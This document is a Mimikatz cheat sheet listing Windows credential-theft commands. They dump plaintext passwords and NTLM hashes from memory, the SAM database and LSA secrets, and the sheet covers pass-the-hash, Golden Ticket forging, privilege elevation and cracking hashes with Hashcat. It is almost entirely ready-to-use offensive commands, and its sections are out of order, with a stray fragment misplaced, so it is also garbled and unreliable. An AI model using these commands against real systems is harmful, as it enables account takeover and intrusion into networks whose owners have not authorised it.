```
sekurlsa::pth /user:Administrator /domain:target.local /ntlm:<NTLM_HASH>
```

| Command | Purpose |
|---------|---------|
| `kerberos::list` | List current Kerberos tickets |
| `sekurlsa::tickets` | Extract Kerberos tickets from memory |
| `kerberos::golden /user:... /domain:... /sid:... /krbtgt:... /id:500` | Create Golden Ticket |
| `kerberos::purge` | Delete all existing tickets |

## 🧂 4. Dump & Crack NTLM Hashes

```
lsadump::sam       # Dump SAM file (local users)
lsadump::secrets   # Extract LSA secrets (service passwords, autologon)
token::elevate     # Elevate to SYSTEM (if not already)
```

Save hashes → crack with Hashcat (mode 1000) or John.

## 🧹 5. Bypass & Defense Evasion

| Command | Effect |
|---------|--------|
| `!+` | Enable PowerShell output |
| `log <file.log>` | Log output to a file |
| `cls` | Clear screen (in interactive mode) |
| `sekurlsa::minidump <dumpfile.dmp>` | Offline analysis from a memory dump |
– needs driver:
```
privilege::debug
```

| Command | Result |
|---------|--------|
| `sekurlsa::logonpasswords` | Plaintext passwords & NTLM hashes of all logged‑on users |
| `sekurlsa::wdigest` | WDigest credentials (plaintext) |
| `sekurlsa::tspkg` | TS PKG credentials |
| `sekurlsa::credman` | Credential Manager stored credentials |

## 💀 2. Pass‑the‑Hash (PtH)

Use NTLM hash to authenticate without the plaintext password:

mimikatz cheat sheet